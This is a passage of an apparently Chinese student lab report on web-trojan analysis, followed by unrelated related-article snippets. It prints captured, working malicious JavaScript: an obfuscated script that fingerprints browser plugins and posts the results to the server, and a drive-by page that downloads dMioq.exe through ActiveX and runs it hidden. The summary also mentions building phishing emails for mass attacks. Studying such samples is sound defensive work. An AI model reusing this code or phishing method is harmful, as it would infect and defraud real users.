})())];Zl++){var Te=yS[Zl][((function () { var QR="Plugin",$="enabled"; return $+QR })())][(String.fromCharCode(100,0145,0163,0143,0162,0x69,0x70,116,0x69,0157,0x6e))][((function () { var qB="ing",kX="Str",sp="o",bo="t"; return bo+sp+kX+qB })())]();var aE=Te[((function () { var Wj="h",Lg="atc",u="m"; return u+Lg+Wj })())](/Shockwave Flash [\d\.]+/g);if(aE!=null){j$=aE[('YfeWbUvBEx'.length-10)][((function () { var G_="h",h="c",JL="t",X="a",mG="m"; return mG+X+JL+h+G_ })())](/\d.+/g)[('WUCAVeyGyW'.length-10)];break;}}}if(j$==null){var pq=navigator[((function () { var Yl="s",t7="gin",K6="plu"; return K6+t7+Yl })())][((function () { var uf="h",vD="gt",e="en",d$="l"; return d$+e+vD+uf })())];for(window[String.fromCharCode(0x69)]=('hAQvnzz'.length-7);window[(function () { var Vb="i"; return Vb })()]<pq;window[(function () { var er="i"; return er })()]++){var G7=navigator[(String.fromCharCode(0160,0x6c,0x75,0x67,0x69,0156,115))][window[(function () { var IN="i"; return IN })()]][(String.fromCharCode(0156,97,0155,101))];var u=navigator[(String.fromCharCode(0160,0154,0x75,0147,0151,0156,115))][window[(function () { var A9="i"; return A9 })()]][(String.fromCharCode(0x76,101,0x72,115,105,0157,0156))];if(/Shockwave Flash/[(String.fromCharCode(0x74,101,0x73,0164))](G7)&&u!=window[(function () { var J="ed",D2="fin",R4="unde"; return R4+D2+J })()]){j$=navigator[((function () { var Px="s",$B="n",$="i",S="plug"; return S+$+$B+Px })())][window[String.fromCharCode(105)]][(String.fromCharCode(118,0145,0x72,0163,0x69,111,110))];break;}}}return j$;};gi[(String.fromCharCode(0147,0x65,0164,0x4a,97,0166,0141,0126,0145,0162,0x73,0151,111,110))]=function(){var xY=null;for(var hF=('HFc'.length-3);hF<('D'.length*'KUCqYPb'.length+3);hF++){for(var r=('LCLJA'.length-5);r<('Q'.length*011+1);r++){for(var $=('nHv'.length-3);$<('t'.length*'cVAzMCAiP'.length+1);$++){for(var X=('VwSfBFMT'.length-8);X<(0xa*'B'.length+0);X++){var NB=String(hF)+String.fromCharCode(46)+String(r)+(function () { var hP="."; return hP })()+String($)+(function () { var G9="."; return G9 })()+String(X);var CL=(function () { var ol="stalled.",KU="isIn",u="JavaWebStart."; return u+KU+ol })()+NB;try{new ActiveXObject(CL);return NB;} catch(g3){continue;}}}}}if(xY==null){var xK=window[((function () { var e="or",Ly="at",OK="navig"; return OK+Ly+e })())][((function () { var oM="s",K8="e",D$="p",PE="y",kC="imeT",NJ="m"; return NJ+kC+PE+D$+K8+oM })())];for(var er=('nQfpcnjDkv'.length-10);er<xK[((function () { var qY="ngth",J="le"; return J+qY })())];er++){var BI=/java.+;version=(.+)/[((function () { var Zo="c",As="exe"; return As+Zo })())](xK[er][(String.fromCharCode(0x74,0171,112,0x65))]);if(BI){var WC=window[(function () { var uJ="oat",mK="seFl",uG="par"; return uG+mK+uJ })()](BI['S'.length]);if(WC>xY){xY=WC;}}}}if(xY==null){var Ns="";var JZ=navigator[((function () { var YE="ns",rY="i",pB="g",KK="plu"; return KK+pB+rY+YE })())][((function () { var e="h",Q7="engt",yu="l"; return yu+Q7+e })())];for(window[(function () { var yo="i"; return yo })()]=('lWftROCw'.length-8);window[(function () { var VD="i"; return VD })()]<JZ;window[(function () { var ue="i"; return ue })()]++){var On=navigator[((function () { var q3="ins",pg="plug"; return pg+q3 })())][window[(function () { var ah="i"; return ah })()]][(String.fromCharCode(0x6e,0141,0155,0x65))];var LQ=navigator[(String.fromCharCode(0x70,0x6c,0165,0147,105,110,115))][window[String.fromCharCode(105)]][(String.fromCharCode(118,0x65,114,0x73,0151,0x6f,0x6e))];if(/Java/[((function () { var X="est",Tn="t"; return Tn+X })())](On)&&LQ!=window[String.fromCharCode(117,0156,0x64,0145,0146,105,110,101,0144)]){xY=navigator[(String.fromCharCode(0160,0x6c,117,103,105,0x6e,0163))][window[(function () { var ky="i"; return ky })()]][((function () { var R="sion",Cy="ver"; return Cy+R })())];break;}}}return xY;};var Y={};Y[((function () { var V3="eX",J7="sActiv",Qt="ha"; return Qt+J7+V3 })())]=function(du,nX){var $=null;if(du[((function () { var l4="ring",NP="st",KF="b",av="su"; return av+KF+NP+l4 })())](('IEi'.length-3),'p'.length)==String[((function () { var gF="ode",Xd="rC",rs="fromCha"; return rs+Xd+gF })())]((0x1*((01*('KIa'.length*0x6+0)+7)*'SrI'.length+2)+46))){$=document[(String.fromCharCode(0143,0x72,0x65,0141,0x74,101,0x45,0154,101,0x6d,0145,0x6e,0x74))](String.fromCharCode(111,0x62,106,101,99,116));$[(String.fromCharCode(0163,101,0164,0101,0x74,116,114,105,0x62,117,116,101))](String.fromCharCode(0143,108,0x61,115,0163,0151,0x64),(function () { var qZ=":",J="d",QS="clsi"; return QS+J+qZ })()+du);$[((function () { var wp="e",S="tribut",N_="t",BN="setA"; return BN+N_+S+wp })())]((function () { var xU="d",Cf="i"; return Cf+xU })(),du);$[(String.fromCharCode(115,0x65,0164,0101,0164,0x74,0x72,0x69,0x62,0165,0164,0145))]((function () { var Fs="le",r="y",X="t",e="s"; return e+X+r+Fs })(),(function () { var VB=": hidden",kG="visibility"; return kG+VB })());$[(String.fromCharCode(0x73,0x65,116,65,0164,116,114,0151,98,0165,116,101))]((function () { var qE="h",vb="t",bL="wid"; return bL+vb+qE })(),(function () { var XT="x",IN="p",R9="0"; return R9+IN+XT })());$[(String.fromCharCode(115,0x65,0x74,0101,0x74,0x74,0x72,105,0x62,0x75,0164,0145))](String.fromCharCode(104,0x65,105,103,0150,0164),(function () { var fw="x",dV="p",R="0"; return R+dV+fw })());document[((function () { var ol="ody",hH="b"; return hH+ol })())][((function () { var PX="Child",PR="append"; return PR+PX })())]($);if(typeof ($[nX])==String.fromCharCode(0165,110,0x64,101,102,0x69,0156,101,0x64)){var Cv=String.fromCharCode(105,0x64,61,0x22)+du+String.fromCharCode(042);Cv+=String.fromCharCode(040,99,0x6c,97,0163,0163,105,0x64,075,34,0x63,108,0x73,105,0x64,072)+du+(function () { var Rc='"'; return Rc })();Cv+=String.fromCharCode(040,0x73,116,0171,108,0x65,075,34,0166,105,0163,105,0x62,0x69,0x6c,105,0164,0171,0x3a,32,0x68,0151,0144,0x64,0x65,0156,0x22);Cv+=(function () { var K0='height="0px"',fq=' width="0px" '; return fq+K0 })();document[((function () { var gf="dy",Ml="o",z="b"; return z+Ml+gf })())][(String.fromCharCode(105,0x6e,0x6e,101,0x72,72,84,77,76))]+=String.fromCharCode(074,0157,0142,0152,101,0x63,0164,32)+Cv+String.fromCharCode(076,60,47,111,0142,0152,101,99,0164,62);$=document[((function () { var La="ntById",NU="getEleme"; return NU+La })())](du);}}else {try{$=new ActiveXObject(du);} catch(oE){return false;};}if(typeof ($[nX])!=(function () { var u='ed',JP='in',Dm='undef'; return Dm+JP+u })()){return true;}return false;};Y[((function () { var r7="eVersion",gO="getMsOffic"; return gO+r7 })())]=function(){var lk;var FO=new Array();for(var C4='E'.length;C4<='WQcYw'.length;C4++){try{FO[C4-'u'.length]=typeof (new ActiveXObject(String.fromCharCode(0x53,104,0x61,0162,0145,80,0157,0x69,110,0164,46,0117,0x70,101,0x6e,68,111,0143,0x75,0155,0145,0156,116,115,0x2e)+C4[(String.fromCharCode(0x74,0157,0123,0164,0x72,0x69,0156,103))]()));} catch(u){FO[C4-'F'.length]=null;}}if(FO[('AdKsojil'.length-8)]==(function () { var Ss='t',fR='c',xV='obje'; return xV+fR+Ss })()&&FO['U'.length]==String.fromCharCode(111,0142,0152,0145,0143,116)&&FO['EE'.length]==String.fromCharCode(111,0142,0x6a,0x65,0x63,0164)&&FO['RSa'.length]==String.fromCharCode(0157,0x62,0x6a,0x65,0x63,116)&&FO['gtvs'.length]==(function () { var da='t',By='bjec',Pn='o'; return Pn+By+da })()){lk=(function () { var Uj="2",w_="201"; return w_+Uj })();}else if(FO[('lj'.length-2)]==(function () { var e='t',J='c',S9S='bje',U6='o'; return U6+S9S+J+e })()&&FO['I'.length]==(function () { var UD='ct',wJ='je',$R='ob'; return $R+wJ+UD })()&&FO['WS'.length]==String.fromCharCode(0157,98,0x6a,0x65,99,0x74)&&FO['bpX'.length]==(function () { var I2='t',_Z='bjec',W0='o'; return W0+_Z+I2 })()&&FO['XjzE'.length]==null){lk=(function () { var Rd="0",X="201"; return X+Rd })();}else if(FO[('CdOvxm'.length-6)]==(function () { var Bd='ect',WB='j',HI='ob'; return HI+WB+Bd })()&&FO['U'.length]==(function () { var S='ect',ck='j',UK='ob'; return UK+ck+S })()&&FO['hB'.length]==String.fromCharCode(111,0142,0x6a,101,0143,0164)&&FO['tnr'.length]==null&&FO['hzcK'.length]==null){lk=String.fromCharCode(062,0x30,060,067);}else if(FO[('ooUhV'.length-5)]==(function () { var h='ct',F6='obje'; return F6+h })()&&FO['W'.length]==String.fromCharCode(111,0x62,106,101,0143,0x74)&&FO['Gw'.length]==null&&FO['nGL'.length]==null&&FO['rgXO'.length]==null){lk=(function () { var $X="03",Vg="20"; return Vg+$X })();}else if(FO[('iKS'.length-3)]==(function () { var X='ct',fM='bje',OG='o'; return OG+fM+X })()&&FO['w'.length]==null&&FO['ln'.length]==null&&FO['Gba'.length]==null&&FO['kXFx'.length]==null){lk=String.fromCharCode(0x78,112);}else {lk=null;}return lk;};function lZ(OR){var Rn=[];for(var Ho in OR){Rn[((function () { var Ol="sh",S="u",oU="p"; return oU+S+Ol })())](window[(function () { var ZE="onent",sn="omp",bP="encodeURIC"; return bP+sn+ZE })()](Ho)+(function () { var x9='='; return x9 })()+window[String.fromCharCode(101,110,0143,0157,0x64,0145,85,82,73,0x43,111,0155,0160,0x6f,0x6e,0x65,110,116)](OR[Ho]));}return N[((function () { var Lk="e",R="d",$d="co",UR="en"; return UR+$d+R+Lk })())](Rn[(String.fromCharCode(0x6a,111,105,0x6e))]((function () { var z3='&'; return z3 })()));}function G(Em){return (!Em||('vcEGqa'.length-6)===Em[((function () { var gj="th",tw="g",pq="n",BB="le"; return BB+pq+tw+gj })())]);}function U(qx){var X=lZ(qx);T(String.fromCharCode(47,0x52,114,0156,0x63,0x6f,057),X,function(){window[(String.fromCharCode(0x6c,0x6f,0143,0141,0x74,105,111,0x6e))]=(function () { var J="it/",MW="/ylCN"; return MW+J })();});}var QM="";var _=true;var dB=null;var W2=null;function K(ZM){QM=ZM;if(dB!=null){window[(function () { var mG="meout",I8="learTi",Ed="c"; return Ed+I8+mG })()](dB);dB=null;}_=false;return;}function E(SU,TD,vl){var RMp,cR,C3,OR,Nn0=TD||{},o8=vl||{};Nn0[((function () { var r="e",Dv="p",ev="ty"; return ev+Dv+r })())]=(function () { var $='ockwave-flash',ad='h',rB='application/x-s'; return rB+ad+$ })();if(window[(String.fromCharCode(0101,99,0164,105,118,101,88,0x4f,98,0x6a,0145,0x63,0164))]){Nn0[(String.fromCharCode(99,0154,0x61,0163,0x73,105,0x64))]=(function () { var O6='cf-96b8-444553540000',qv='clsid:d27cdb6e-ae6d-11'; return qv+O6 })();o8[(String.fromCharCode(0x6d,111,0x76,0x69,0x65))]=SU;}else {Nn0[(String.fromCharCode(100,0141,0164,97))]=SU;}cR=(function () { var le='t',uC='ec',b$='<obj'; return b$+uC+le })();for(RMp in Nn0){cR+=(function () { var un=' '; return un })()+RMp+(function () { var Hv='"',e='='; return e+Hv })()+Nn0[RMp]+(function () { var yq='"'; return yq })();}cR+=String.fromCharCode(076);for(RMp in o8){cR+=String.fromCharCode(0x3c,0160,97,0162,0141,109,040,110,0141,0x6d,101,075,042)+RMp+(function () { var rw='"',tN='lue=',N$='" va'; return N$+tN+rw })()+o8[RMp]+(function () { var ik='>',e='" /'; return e+ik })();}cR+=String.fromCharCode(60,0x2f,0157,0142,106,101,0x63,0x74,0x3e);C3=document[((function () { var U0="t",Kv="eElemen",U3="eat",r1="cr"; return r1+U3+Kv+U0 })())]((function () { var j6='v',DC='i',xB='d'; return xB+DC+j6 })());C3[((function () { var OX="HTML",sw="inner"; return sw+OX })())]=cR;OR=C3[((function () { var Cm="hild",Be="firstC"; return Be+Cm })())];C3[((function () { var h7="hild",ul="C",Fd="remove"; return Fd+ul+h7 })())](OR);return OR;}window[((function () { var P3="d",qo="oa",R="onl"; return R+qo+P3 })())]=function(){var $=Z1[((function () { var iF="on",qH="i",Jx="s",S="getVer"; return S+Jx+qH+iF })())]();var Hi={"os_vendor":$[((function () { var KL="endor",uS="os_v"; return uS+KL })())],"os_device":$[((function () { var UX="vice",n5="os_de"; return n5+UX })())],"ua_name":$[(String.fromCharCode(0x75,97,0137,110,0x61,0155,101))],"ua_ver":$[((function () { var $p="sion",KI="er",zN="_v",gN="ua"; return gN+zN+KI+$p })())],"arch":$[(String.fromCharCode(0141,114,0143,104))],"java":gi[((function () { var jS="Version",pm="va",h6="etJa",z="g"; return z+h6+pm+jS })())](),"silverlight":gi[(String.fromCharCode(104,97,0x73,83,0151,0x6c,0x76,101,114,0154,0x69,0x67,104,0164))](),"flash":gi[(String.fromCharCode(103,101,0164,0106,0x6c,97,0163,104,86,0x65,0162,0x73,0x69,0x6f,110))](),"vuln_test":true,"os_name":$[(String.fromCharCode(0x6f,0x73,95,0x6e,97,0155,101))]};Hi[(function () { var zO='e',s57='ffic',J='o'; return J+s57+zO })()]=Y[(String.fromCharCode(103,0145,0x74,77,0163,0117,0146,0146,0x69,0x63,0145,0126,0x65,114,115,0151,0157,0156))]();Hi[String.fromCharCode(0155,115,0x68,116,109,0x6c,0137,0x62,0x75,105,0154,0x64)]=window[(function () { var e="n",h="neBuildVersio",mG="iptEngi",xn="Scr"; return xn+mG+h+e })()]()[((function () { var r="ring",l7="St",xb="to"; return xb+l7+r })())]();if(Hi[String.fromCharCode(0146,0x6c,0141,115,0x68)]!=null&&(Hi[String.fromCharCode(0x66,0x6c,0x61,115,104)][((function () { var cs="tch",rx="a",ND="m"; return ND+rx+cs })())](/[\d]+.[\d]+.[\d]+.[\d]+/))==null){var SX=E(String.fromCharCode(057,97,0124,120,72,0144,109,0120,0x49,77,46,115,0167,0146),{"\u0077\x69\x64\u0074\u0068":'E'.length,"\x68\x65\x69\147\u0068\164":'S'.length},{"\141\u006c\x6c\157\u0077\x53\u0063\162\151\x70\u0074\101\143\143\u0065\163\163":String.fromCharCode(0141,108,0167,97,121,0163),"\x50\x6c\x61\x79":String.fromCharCode(0x54,114,0165,0x65)});dB=setTimeout(function(){if(W2!=null){_=false;window[(function () { var b7="val",ze="arInter",ps="le",Cr="c"; return Cr+ps+ze+b7 })()](W2);}if(!G(QM)){Hi[(function () { var wQ="h",oz="s",XU="fla"; return XU+oz+wQ })()]=QM;}U(Hi);},(0x1*06637+1513));W2=setInterval(function(){if(!_){window[String.fromCharCode(0x63,0154,0x65,0x61,0162,0x49,0x6e,116,0145,114,0x76,97,0154)](W2);if(!G(QM)){Hi[String.fromCharCode(102,0x6c,0x61,0x73,104)]=QM;}U(Hi);}},('rAOY'.length*027+8));document[((function () { var RR="ody",va="b"; return va+RR })())][((function () { var BY="ld",nJ="Chi",j4="append"; return j4+nJ+BY })())](SX);}else {U(Hi);}};
      </script>
      <noscript>
      <img style="visibility:hidden" src="/XDWPUmm/">
      <meta http-equiv="refresh" content="1; url=/ylCNit/">
      </noscript>
      

解析一下,发现调用了dMioq.exe可执行程序,此程序正是造成被攻击的原因。

<html><head><title></title><script language="javascript">function UAFxWqWengBBDyjOGgur(o,n){var r=null;try{eval("r=o.CreateObject(n)")}catch(e){}if(!r){try{eval("r=o.CreateObject(n,'')")}catch(e){}}if(!r){try{eval("r=o.CreateObject(n,'','')")}catch(e){}}if(!r){try{eval("r=o.GetObject('',n)")}catch(e){}}if(!r){try{eval("r=o.GetObject(n,'')")}catch(e){}}if(!r){try{eval("r=o.GetObject(n)")}catch(e){}}return(r)}function DG(a){var s=UAFxWqWengBBDyjOGgur(a,"WScript.Shell");var o=UAFxWqWengBBDyjOGgur(a,"ADODB.Stream");var e=s.Environment("Process");var url=document.location+'/payload';var xml=null;var bin=e.Item("TEMP")+"\\dMioq.exe";var dat;try{xml=new XMLHttpRequest()}catch(e){try{xml=new ActiveXObject("Microsoft.XMLHTTP")}catch(e){xml=new ActiveXObject("MSXML2.ServerXMLHTTP")}}if(!xml){return(0)}xml.open("GET",url,false);xml.send(null);dat=xml.responseBody;o.Type=1;o.Mode=3;o.Open();o.Write(dat);o.SaveToFile(bin,2);s.Run(bin,0)}function qzOYiUnpVxKmDjXQZFuOEI(){var i=0;var t=new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}','{BD96C556-65A3-11D0-983A-00C04FC29E30}','{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}','{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}','{6414512B-B978-451D-A0D8-FCFDF33E833C}','{06723E09-F4C2-43c8-8358-09FCD1DB0766}','{639F725F-1B2D-4831-A9FD-874847682010}','{BA018599-1DB3-44f9-83B4-461454C84BF8}','{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}','{E8CCCDDF-CA28-496b-B050-6C07C962476B}','{AB9BCEDD-EC7E-47E1-9322-D4A210617116}','{0006F033-0000-0000-C000-000000000046}','{0006F03A-0000-0000-C000-000000000046}',null);while(t[i]){var a=null;if(t[i].substring(0,1)=='{'){a=document.createElement("object");a.setAttribute("classid","clsid:"+t[i].substring(1,t[i].length-1))}else{try{a=new ActiveXObject(t[i])}catch(e){}}if(a){try{var b=UAFxWqWengBBDyjOGgur(a,"WScript.Shell");if(b){DG(a);return(0)}}catch(e){}}i++}}</script></head><body onload='qzOYiUnpVxKmDjXQZFuOEI()'>duafIlNMYJKjSFkKtmGeHvJxh</body></html>

在这里插入图片描述

3.学习中遇到的问题及解决

  • 问题1:靶机链接不上桥接网络
  • 问题1解决方案:重新配置该虚拟机的ip地址,并重启,可以成功连接到网络

4.实践总结

通过这次学习,我学到了木马文件的分析,尤其是网页木马的攻击,本地木马的文件分析,都让我了解关于更多的木马流程,此外我还学习到了如何构造一个钓鱼邮件进行攻击,通过这样的方式,可以批量攻击受害者。希望这次的学习可以运用到后面的学习实践中。

参考资料

  • 《Java程序设计与数据结构教程(第二版)》
  • 《Java程序设计与数据结构教程(第二版)》学习指导

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1701036.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

工具:Visual Studio Code

一、VSCode生成exe 二、在vs中断点调试 如果没效果需要安装如下与unity相连接的插件 三、注释 1、代码注释 注释和取消都是都是同一个命令&#xff1a;选中代码&#xff0c;然后按住CtrlShift/ 2、方法或类注释 /// 四、导航 五、将变量注释展示到解释面板 1、直接显示 [Too…

YOLOv8: RuntimeError: DataLoader worker (pid(s) xxxxx) exited unexpectedly

遇到错误&#xff1a; 一、 raise RuntimeError(DataLoader worker (pid(s) {}) exited unexpectedly.format(pids_str)) RuntimeError: DataLoader worker (pid(s) 4252, 17184) exited unexpectedly二、OSError: [WinError 1455] 页面文件太小&#xff0c;无法完成操作。 处…

有趣的css - 水波纹按钮

大家好&#xff0c;我是 Just&#xff0c;这里是「设计师工作日常」&#xff0c;今天分享的是一个好看有质感的水波纹按钮。 最新文章通过公众号「设计师工作日常」发布。 目录 整体效果核心代码html 代码css 部分代码 完整代码如下html 页面css 样式页面渲染效果 整体效果 &a…

【C++语言】继承:类特性的扩展,重要的类复用!

【C语言】继承&#xff0c;更进一步的复用 ✨精美思维导图奉上继承1. 继承的相关概念&#xff1a;2. 继承的定义&#xff1a;&#xff08;1&#xff09;定义格式&#xff1a;&#xff08;2&#xff09;访问限定符和继承方式&#xff1a;&#xff08;3&#xff09;默认继承方式&…

取代或转型?人工智能对软件测试的影响(内附工具推荐)

在当今快速发展的数字环境中&#xff0c;从移动App到基于Web的平台&#xff0c;软件已成为我们日常生活和工作不可或缺的一部分。然而&#xff0c;随着软件系统变得越来越复杂&#xff0c;如何确保其质量和可靠性已成为开发人员和测试人员所面临的一大重要挑战。 这就是软件测…

强化学习,第 3 部分:蒙特卡罗方法

文章目录 一、介绍二、关于此文章三、无模型方法与基于模型的方法四、V函数估计4.1 基本概念4.2 V-功能 五、Q 函数估计5.1 V函数概念5.2 优势5.3 Q函数 六、勘探与勘探的权衡七、结论 一、介绍 从赌场到人工智能&#xff1a;揭示蒙特卡罗方法在复杂环境中的强大功能    强化…

生命在于学习——Python人工智能原理(2.1)

二、机器学习 1、机器学习的定义 机器学习是指从有限的观测数据中学习出具有一般性的规律&#xff0c;并利用这些规律对未知数据进行预测的方法&#xff0c;通俗的讲&#xff0c;机器学习就是让计算机从数据中进行自动学习&#xff0c;得到某种知识。 传统的机器学习主要关注…

深度强化学习 Actor-Critic演员评论家 PPO

将策略(Policy Based)和价值(Value Based)相结合的方法&#xff1a;Actor-Critic算法&#xff0c;在强化学习领域最受欢迎的A3C算法&#xff0c;DDPG算法&#xff0c;PPO算法等都是AC框架。 一、Actor-Critic算法简介 Actor-Critic从名字上看包括两部分&#xff0c;演员(Actor…

Geoserver发布shp图层服务的样式控制及样式生成方式

在利用geoserver发布视频图层服务时&#xff0c;shp图层的样式可以在QGis文件中进行编辑&#xff1b;shp文件编辑后&#xff0c;需要导出样式文件&#xff0c;并在geoserver中进行注册&#xff0c;发布时对应shp图层文件时&#xff0c;需要选中对应样式&#xff0c;加载图层服务…

WorkPlus移动应用平台集成单点登录,实现统一门户解决方案

随着企业数字化转型的深入&#xff0c;移动办公已经成为企业提高工作效率和员工协作的重要途径。为了更好地管理企业移动应用&#xff0c;提升员工体验&#xff0c;简化登录流程&#xff0c;许多企业开始采用集成单点登录技术的企业移动应用平台&#xff0c;实现统一门户的目标…

实验室课程|基于SprinBoot+vue的实验室课程管理系统(源码+数据库+文档)

实验室课程管理系统 目录 基于SprinBootvue的实验室课程管理系统 一、前言 二、系统设计 三、系统功能设计 1管理员功能模块 2学生功能模块 3教师功能模块 四、数据库设计 五、核心代码 六、论文参考 七、最新计算机毕设选题推荐 八、源码获取&#xff1a; 博主介…

PMP考试通关秘籍

考试大纲 考试大纲&#xff1a;考察维度3 个&#xff08;人、过程、商业环境&#xff09;&#xff1b;更加贴近真实项目趋势&#xff1b;侧重点从做事到关注人&#xff1b;对于项目经理的软技能要求更高&#xff0c;匹配 PM 能力模型。 人员&#xff08;42%&#xff09;&…

55页PDF|人工智能通用大模型(ChatGPT)的进展、风险与应对(附下载)

&#x1f449;获取方式&#xff1a; &#x1f61d;有需要的小伙伴&#xff0c;可以保存图片到wx扫描二v码免费领取【保证100%免费】&#x1f193;

3D技术的应用领域

3D技术在现代科技和工业中有广泛的应用&#xff0c;其涵盖的领域非常广泛&#xff0c;从娱乐到医学&#xff0c;再到制造业和建筑&#xff0c;3D技术正在改变我们理解和互动的方式。以下是一些主要的应用领域。北京木奇移动技术有限公司&#xff0c;专业的软件外包开发公司&…

k8s devops实战教程+生产实践+可就业

k8s devops实战教程 简介教程涉及到内容教程获取学习教程后的收货助学群 简介 越来越多的企业应用云原生化&#xff0c;催生很多应用的部署方式也发生了很多变化。 从物理机部署应用过度到虚机部署应用再到应用容器化&#xff0c;从单应用再到服务拆分为微服务&#xff0c;靠人…

linux查看是否被入侵(一)

1、查看当前系统状态 [rootbastion-IDC ~]#top #一般挖矿等病毒点用CPU比较大 2、查看当前登录用户(w\who) 3、检查系统日志 检查系统错误登陆日志&#xff0c;统计IP重试次数 [rootbastion-IDC ~]# lastb 4、查看近期用户登录情况 [rootkvm01 ~]# last -n 5 #-n 5 表示…

element el-table表格表头某一列表头文字或者背景修改颜色

效果如下 整体代码 &#xff0c;具体方法在最下面&#xff01; <el-table v-loading"listLoading" :data"sendReceivList" element-loading-text"Loading" border fit ref"tableList" :header-cell-class-name"addClass&quo…

揭秘APP广告变现的高效秘诀:如何让你的APP更赚钱?

在数字化时代&#xff0c;APP已成为人们获取信息、娱乐休闲的重要平台。对于许多内容创作者来说&#xff0c;如何通过APP实现盈利&#xff0c;是一个亟待解决的问题。而APP广告变现项目&#xff0c;正是其中一种备受关注的盈利模式。那么&#xff0c;如何有效地利用APP广告变现…

安泰电子:功率放大器的选择方法有哪些

选择适合的功率放大器是实现电子系统中的关键步骤之一。以下是一些选择功率放大器的常用方法和考虑因素&#xff1a; 功率需求&#xff1a;首先确定你的系统需要多大的功率输出。功率输出需求通常由被驱动设备的功率要求决定。计算出所需功率后&#xff0c;选择一个具有适当功率…

绿色阅读:旧书回收,让知识循环

在快节奏的现代社会中&#xff0c;知识的获取和更新速度日新月异。然而&#xff0c;在这个信息爆炸的时代&#xff0c;我们是否曾想过&#xff0c;那些曾经陪伴我们度过无数日夜、给予我们智慧和启迪的旧书&#xff0c;在它们完成使命后&#xff0c;是否应该被遗忘在角落&#…